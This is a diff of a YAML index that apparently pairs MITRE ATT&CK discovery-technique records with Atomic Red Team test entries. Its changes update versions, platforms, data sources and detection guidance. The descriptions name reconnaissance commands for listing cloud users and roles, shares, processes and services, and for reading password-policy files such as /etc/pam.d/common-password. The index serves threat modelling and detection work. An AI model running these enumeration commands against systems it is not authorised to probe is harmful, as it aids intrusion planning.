Office 365.(Citation: Microsoft msolrolemember)(Citation: GitHub + Raindance) The Azure CLI (AZ CLI) also provides an interface to obtain user + accounts with authenticated access to a domain. The command az ad user + list will list all users within a domain.(Citation: Microsoft AZ CLI)(Citation: + Black Hills Red Teaming MS AD Azure, 2018) \n\nThe AWS command aws iam + list-users may be used to obtain a list of users in the current account + while aws iam list-roles can obtain IAM roles that have a specified + path prefix.(Citation: AWS List Roles)(Citation: AWS List Users) In GCP, gcloud + iam service-accounts list and gcloud projects get-iam-policy + may be used to obtain a listing of service accounts and users in a project.(Citation: + Google Cloud - IAM Servie Accounts List API)" id: attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: discovery - modified: '2020-03-13T20:05:15.448Z' + modified: '2020-08-13T16:53:55.390Z' created: '2020-02-21T21:08:36.570Z' + x_mitre_contributors: + - Praetorian x_mitre_data_sources: + - Stackdriver logs + - AWS CloudTrail logs - Azure activity logs - Office 365 account logs - Process monitoring @@ -39286,10 +44024,10 @@ discovery: x_mitre_permissions_required: - User x_mitre_detection: |- - System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained. + Monitor processes, command-line arguments, and logs for actions that could be taken to gather information about cloud accounts, including the use of calls to cloud APIs that perform account discovery. - Monitor processes and command-line arguments for actions that could be taken to gather system and network information. - x_mitre_version: '1.0' + System and network discovery techniques normally occur throughout an operation as an adversary learns the environment, and also to an extent in normal network operations. Therefore discovery data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained. + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_platforms: - AWS @@ -39334,9 +44072,12 @@ discovery: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: discovery - modified: '2020-03-12T19:25:12.782Z' + modified: '2020-10-08T17:34:39.077Z' created: '2020-02-21T21:15:33.222Z' x_mitre_data_sources: + - GCP audit logs + - Stackdriver logs + - AWS CloudTrail logs - Azure activity logs - Office 365 account logs - API monitoring @@ -39348,11 +44089,83 @@ discovery: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Activity and account logs for the cloud services can also be monitored for suspicious commands that are anomalous compared to a baseline of normal activity. - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_platforms: - Office 365 - Azure AD + - GCP + - SaaS + - Azure + - AWS + atomic_tests: [] + T1580: + technique: + external_references: + - source_name: mitre-attack + external_id: T1580 + url: https://attack.mitre.org/techniques/T1580 + - source_name: Amazon Describe Instance + url: https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html + description: Amazon. (n.d.). describe-instance-information. Retrieved March + 3, 2020. + - source_name: Amazon Describe Instances API + url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html + description: Amazon. (n.d.). DescribeInstances. Retrieved May 26, 2020. + - source_name: Google Compute Instances + url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list + description: Google. (n.d.). gcloud compute instances list. Retrieved May + 26, 2020. + - description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019. + url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest + source_name: Microsoft AZ CLI + - source_name: Expel IO Evil in AWS + url: https://expel.io/blog/finding-evil-in-aws/ + description: A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding + Evil in AWS. Retrieved June 25, 2020. + - source_name: Mandiant M-Trends 2020 + url: https://content.fireeye.com/m-trends/rpt-m-trends-2020 + description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, + 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Cloud Infrastructure Discovery + description: |- + An adversary may attempt to discover resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services. + + Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances API within the Amazon EC2 API that can return information about one or more instances within an account, as well as the ListBuckets API that returns a list of all buckets owned by the authenticated sender of the request.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API) Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list command to list all Google Compute Engine instances in a project(Citation: Google Compute Instances), and Azure's CLI command az vm list lists details of virtual machines.(Citation: Microsoft AZ CLI) + + An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020) Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves. + id: attack-pattern--57a3d31a-d04f-4663-b2da-7df8ec3f8c9d + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: discovery + modified: '2020-09-17T16:41:23.267Z' + created: '2020-08-20T17:51:25.671Z' + x_mitre_contributors: + - Praetorian + x_mitre_version: '1.0' + x_mitre_is_subtechnique: false + x_mitre_permissions_required: + - User + x_mitre_detection: Establish centralized logging for the activity of cloud infrastructure + components. Monitor logs for actions that could be taken to gather information + about cloud infrastructure, including the use of discovery API calls by new + or unexpected users. To reduce false positives, valid change management procedures + could introduce a known identifier that is logged with the change (e.g., tag + or header) if supported by the cloud provider, to help distinguish valid, + expected actions from malicious ones. + x_mitre_data_sources: + - GCP audit logs + - Stackdriver logs + - AWS CloudTrail logs + - Azure activity logs + x_mitre_platforms: + - AWS + - Azure + - GCP atomic_tests: [] T1538: technique: @@ -39914,12 +44727,6 @@ discovery: name: command_prompt T1482: technique: - created: '2019-02-14T16:15:05.974Z' - modified: '2020-03-26T16:13:21.085Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: discovery - type: attack-pattern external_references: - source_name: mitre-attack external_id: T1482 @@ -39934,7 +44741,7 @@ discovery: Trust Tickets to Spoof Access across Active Directory Trusts. Retrieved February 14, 2019. - source_name: Harmj0y Domain Trusts - url: 'http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/ ' + url: http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/ description: Schroeder, W. (2017, October 30). A Guide to Attacking Domain Trusts. Retrieved February 14, 2019. - source_name: Microsoft Operation Wilysupply @@ -39963,6 +44770,12 @@ discovery: [Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)' id: attack-pattern--767dbf9e-df3f-45cb-8998-4903ab5f80c0 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: discovery + modified: '2020-09-17T18:26:17.858Z' + created: '2019-02-14T16:15:05.974Z' x_mitre_version: '1.1' x_mitre_permissions_required: - User @@ -40165,49 +44978,55 @@ discovery: T1083: technique: created: '2017-05-31T21:31:04.710Z' - modified: '2020-03-26T17:18:36.857Z' + modified: '2020-09-16T16:02:16.770Z' kill_chain_phases: - kill_chain_name: mitre-attack phase_name: discovery type: attack-pattern - id: attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: File and Directory Discovery - description: |- - Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. - - Many command shell utilities can be used to obtain this information. Examples include dir, tree, ls, find, and locate. (Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106). + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1083 url: https://attack.mitre.org/techniques/T1083 + - external_id: CAPEC-127 + source_name: capec + url: https://capec.mitre.org/data/definitions/127.html + - external_id: CAPEC-497 + source_name: capec + url: https://capec.mitre.org/data/definitions/497.html - url: http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html description: Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016. source_name: Windows Commands JPCERT - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - x_mitre_system_requirements: - - Some folders may require Administrator, SYSTEM or specific user depending - on permission levels and access controls - x_mitre_permissions_required: - - User - - Administrator - - SYSTEM - x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_detection: |- - System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained. + description: |- + Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. - Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). + Many command shell utilities can be used to obtain this information. Examples include dir, tree, ls, find, and locate. (Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106). + name: File and Directory Discovery + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18 + x_mitre_is_subtechnique: false + x_mitre_version: '1.3' x_mitre_data_sources: - File monitoring - Process monitoring - Process command-line parameters - x_mitre_version: '1.2' - x_mitre_is_subtechnique: false + x_mitre_detection: |- + System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained. + + Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_permissions_required: + - User + - Administrator + - SYSTEM + x_mitre_system_requirements: + - Some folders may require Administrator, SYSTEM or specific user depending + on permission levels and access controls identifier: T1083 atomic_tests: - name: File and Directory Discovery (cmd.exe) @@ -40761,13 +45580,7 @@ discovery: Shared Resource) (Citation: TechNet Shared Folder) [Net](https://attack.mitre.org/software/S0039) can be used to query a remote system for available shared drives using the net view \\\\remotesystem command. It can also be used to query - shared drives on the local system using net share.\n\nCloud virtual - networks may contain remote network shares or file storage services accessible - to an adversary after they have obtained access to a system. For example, - AWS, GCP, and Azure support creation of Network File System (NFS) shares and - Server Message Block (SMB) shares that may be mapped on endpoint or cloud-based - systems.(Citation: Amazon Creating an NFS File Share)(Citation: Google File - servers on Compute Engine)" + shared drives on the local system using net share." external_references: - source_name: mitre-attack external_id: T1135 @@ -40783,21 +45596,13 @@ discovery: description: Microsoft. (n.d.). Share a Folder or Drive. Retrieved June 30, 2017. source_name: TechNet Shared Folder - - source_name: Amazon Creating an NFS File Share - url: https://docs.aws.amazon.com/storagegateway/latest/userguide/CreatingAnNFSFileShare.html - description: Amazon. (n.d.). Creating an NFS File Share. Retrieved October - 23, 2019. - - source_name: Google File servers on Compute Engine - url: https://cloud.google.com/solutions/filers-on-compute-engine - description: Google Cloud. (2019, October 10). File servers on Compute Engine. - Retrieved October 23, 2019. object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: discovery - modified: '2020-03-15T00:59:10.149Z' + modified: '2020-10-07T18:10:06.463Z' created: '2017-12-14T16:46:06.044Z' x_mitre_is_subtechnique: false x_mitre_contributors: @@ -40807,22 +45612,17 @@ discovery: x_mitre_platforms: - macOS - Windows - - AWS - - GCP - - Azure - Linux x_mitre_detection: |- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained. Normal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). - - In cloud-based systems, native logging can be used to identify access to certain APIs and dashboards that may contain system information. Depending on how the environment is used, that data alone may not be sufficient due to benign use during normal operations. x_mitre_data_sources: - Process monitoring - Process command-line parameters - Network protocol analysis - Process use of network - x_mitre_version: '2.1' + x_mitre_version: '3.0' identifier: T1135 atomic_tests: - name: Network Share Discovery @@ -41084,7 +45884,7 @@ discovery: description: |- Adversaries may attempt to access detailed information about the password policy used within an enterprise network. Password policies for networks are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This would help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts). - Password policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as net accounts (/domain), chage -l , cat /etc/pam.d/common-password, and pwpolicy getaccountpolicies.(Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies) + Password policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as net accounts (/domain), Get-ADDefaultDomainPasswordPolicy, chage -l , cat /etc/pam.d/common-password, and pwpolicy getaccountpolicies.(Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies) external_references: - source_name: mitre-attack external_id: T1201 @@ -41103,7 +45903,7 @@ discovery: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: discovery - modified: '2020-03-26T17:17:42.457Z' + modified: '2020-09-29T14:48:07.227Z' created: '2018-04-18T17:59:24.739Z' x_mitre_is_subtechnique: false x_mitre_platforms: @@ -41123,7 +45923,7 @@ discovery: - Process monitoring x_mitre_contributors: - Sudhanshu Chauhan, @Sudhanshu_C - x_mitre_version: '1.1' + x_mitre_version: '1.2' identifier: T1201 atomic_tests: - name: Examine password complexity policy - Ubuntu @@ -41279,12 +46079,6 @@ discovery: atomic_tests: [] T1069: technique: - created: '2017-05-31T21:30:55.471Z' - modified: '2020-03-26T17:48:28.002Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: discovery - type: attack-pattern id: attack-pattern--15dbf668-795c-41e6-8219-f0447c0e64ce created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Permission Groups Discovery @@ -41301,6 +46095,12 @@ discovery: url: https://capec.mitre.org/data/definitions/576.html object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: discovery + modified: '2020-10-08T17:36:01.675Z' + created: '2017-05-31T21:30:55.471Z' x_mitre_is_subtechnique: false x_mitre_contributors: - Microsoft Threat Intelligence Center (MSTIC) @@ -41321,22 +46121,26 @@ discovery: Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). x_mitre_data_sources: + - Stackdriver logs + - GCP audit logs + - AWS CloudTrail logs - Azure activity logs - Office 365 account logs - API monitoring - Process monitoring - Process command-line parameters - x_mitre_version: '2.1' + x_mitre_version: '2.2' atomic_tests: [] T1057: technique: - id: attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Process Discovery - description: |- - Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. - - In Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or Get-Process via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as CreateToolhelp32Snapshot. In Mac and Linux, this is accomplished with the ps command. Adversaries may also opt to enumerate processes via /proc. + created: '2017-05-31T21:30:48.728Z' + modified: '2020-03-26T18:05:53.130Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: discovery + type: attack-pattern + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1057 @@ -41344,34 +46148,33 @@ discovery: - external_id: CAPEC-573 source_name: capec url: https://capec.mitre.org/data/definitions/573.html - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: discovery - modified: '2020-03-26T18:05:53.130Z' - created: '2017-05-31T21:30:48.728Z' - x_mitre_is_subtechnique: false - x_mitre_system_requirements: - - Administrator, SYSTEM may provide better process ownership details - x_mitre_permissions_required: - - User - - Administrator - - SYSTEM - x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_detection: |- - System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained. + description: |- + Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. - Normal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). + In Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or Get-Process via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as CreateToolhelp32Snapshot. In Mac and Linux, this is accomplished with the ps command. Adversaries may also opt to enumerate processes via /proc. + name: Process Discovery + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580 + x_mitre_version: '1.2' x_mitre_data_sources: - API monitoring - Process monitoring - Process command-line parameters - x_mitre_version: '1.2' + x_mitre_detection: |- + System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained. + + Normal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_permissions_required: + - User + - Administrator + - SYSTEM + x_mitre_system_requirements: + - Administrator, SYSTEM may provide better process ownership details + x_mitre_is_subtechnique: false identifier: T1057 atomic_tests: - name: Process Discovery - ps @@ -41490,9 +46293,21 @@ discovery: elevation_required: true T1018: technique: - id: attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Remote System Discovery + created: '2017-05-31T21:30:28.187Z' + modified: '2020-09-17T12:26:53.669Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: discovery + type: attack-pattern + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1018 + url: https://attack.mitre.org/techniques/T1018 + - external_id: CAPEC-292 + source_name: capec + url: https://capec.mitre.org/data/definitions/292.html description: "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within @@ -41503,76 +46318,31 @@ discovery: or /etc/hosts) in order to discover the hostname to IP address mappings of remote systems. \n\nSpecific to macOS, the bonjour protocol exists to discover additional Mac-based systems within the same broadcast - domain.\n\nWithin IaaS (Infrastructure as a Service) environments, remote - systems include instances and virtual machines in various states, including - the running or stopped state. Cloud providers have created methods to serve - information about remote systems, such as APIs and CLIs. For example, AWS - provides a DescribeInstances API within the Amazon EC2 API and - a describe-instances command within the AWS CLI that can return - information about all instances within an account.(Citation: Amazon Describe - Instances API)(Citation: Amazon Describe Instances CLI) Similarly, GCP's Cloud - SDK CLI provides the gcloud compute instances list command to - list all Google Compute Engine instances in a project, and Azure's CLI az - vm list lists details of virtual machines.(Citation: Google Compute - Instances)(Citation: Azure VM List)" - external_references: - - source_name: mitre-attack - external_id: T1018 - url: https://attack.mitre.org/techniques/T1018 - - external_id: CAPEC-292 - source_name: capec - url: https://capec.mitre.org/data/definitions/292.html - - source_name: Amazon Describe Instances API - url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html - description: Amazon. (n.d.). DescribeInstances. Retrieved May 26, 2020. - - source_name: Amazon Describe Instances CLI - url: https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/describe-instances.html - description: Amazon. (n.d.). describe-instances. Retrieved May 26, 2020. - - source_name: Google Compute Instances - url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list - description: Google. (n.d.). gcloud compute instances list. Retrieved May - 26, 2020. - - source_name: Azure VM List - url: https://docs.microsoft.com/en-us/cli/azure/vm?view=azure-cli-latest - description: Microsoft. (n.d.). az vm. Retrieved May 26, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: discovery - modified: '2020-05-26T15:02:19.656Z' - created: '2017-05-31T21:30:28.187Z' - x_mitre_is_subtechnique: false - x_mitre_contributors: - - Praetorian - - RedHuntLabs, @redhuntlabs - x_mitre_permissions_required: - - User - - Administrator - - SYSTEM - x_mitre_platforms: - - Linux - - macOS - - Windows - - GCP - - Azure - - AWS - x_mitre_detection: |- - System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained. - - Normal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). - - In cloud environments, the usage of particular commands or APIs to request information about remote systems may be common. Where possible, anomalous usage of these commands and APIs or the usage of these commands and APIs in conjunction with additional unexpected commands may be a sign of malicious use. Logging methods provided by cloud providers that capture history of CLI commands executed or API usage may be utilized for detection. + domain." + name: Remote System Discovery + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735 + x_mitre_version: '3.0' x_mitre_data_sources: - - Azure activity logs - - Stackdriver logs - - AWS CloudTrail logs - Network protocol analysis - Process monitoring - Process use of network - Process command-line parameters - x_mitre_version: '2.1' + x_mitre_detection: |- + System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained. + + Normal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_permissions_required: + - User + - Administrator + - SYSTEM + x_mitre_contributors: + - RedHuntLabs, @redhuntlabs + x_mitre_is_subtechnique: false identifier: T1018 atomic_tests: - name: Remote System Discovery - net @@ -41831,10 +46601,13 @@ discovery: - source_name: mitre-attack external_id: T1518.001 url: https://attack.mitre.org/techniques/T1518/001 + - external_id: CAPEC-581 + source_name: capec + url: https://capec.mitre.org/data/definitions/581.html - source_name: Expel IO Evil in AWS url: https://expel.io/blog/finding-evil-in-aws/ - description: Anthony Randazzo, Britton Manahan and Sam Lipton. (2020, April - 28). Finding Evil in AWS. Retrieved June 25, 2020. + description: A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding + Evil in AWS. Retrieved June 25, 2020. object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 @@ -41850,7 +46623,7 @@ discovery: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: discovery - modified: '2020-06-29T17:32:24.787Z' + modified: '2020-09-16T19:36:16.978Z' created: '2020-02-21T21:16:18.066Z' x_mitre_data_sources: - Stackdriver logs @@ -41867,7 +46640,7 @@ discovery: Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). In cloud environments, additionally monitor logs for the usage of APIs that may be used to gather information about security software configurations within the environment. - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_platforms: - Linux @@ -41958,9 +46731,12 @@ discovery: T1518: technique: external_references: - - external_id: T1518 - source_name: mitre-attack + - source_name: mitre-attack + external_id: T1518 url: https://attack.mitre.org/techniques/T1518 + - external_id: CAPEC-580 + source_name: capec + url: https://capec.mitre.org/data/definitions/580.html object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 @@ -41974,10 +46750,10 @@ discovery: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: discovery - modified: '2020-06-29T19:34:39.136Z' + modified: '2020-09-16T19:36:17.133Z' created: '2019-09-16T17:52:44.147Z' x_mitre_is_subtechnique: false - x_mitre_version: '1.1' + x_mitre_version: '1.2' x_mitre_permissions_required: - User - Administrator @@ -42778,9 +47554,21 @@ discovery: name: powershell T1007: technique: - id: attack-pattern--322bad5a-1c49-4d23-ab79-76d641794afa - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: System Service Discovery + created: '2017-05-31T21:30:21.315Z' + modified: '2020-03-15T01:05:08.805Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: discovery + type: attack-pattern + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + url: https://attack.mitre.org/techniques/T1007 + external_id: T1007 + - external_id: CAPEC-574 + source_name: capec + url: https://capec.mitre.org/data/definitions/574.html description: Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using [Tasklist](https://attack.mitre.org/software/S0057), @@ -42789,36 +47577,24 @@ discovery: from [System Service Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. - external_references: - - source_name: mitre-attack - url: https://attack.mitre.org/techniques/T1007 - external_id: T1007 - - external_id: CAPEC-574 - source_name: capec - url: https://capec.mitre.org/data/definitions/574.html - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: discovery - modified: '2020-03-15T01:05:08.805Z' - created: '2017-05-31T21:30:21.315Z' - x_mitre_is_subtechnique: false - x_mitre_platforms: - - Windows - x_mitre_permissions_required: - - User - - Administrator - - SYSTEM + name: System Service Discovery + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--322bad5a-1c49-4d23-ab79-76d641794afa + x_mitre_version: '1.1' + x_mitre_data_sources: + - Process monitoring + - Process command-line parameters x_mitre_detection: |- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained. Monitor processes and command-line arguments for actions that could be taken to gather system information related to services. 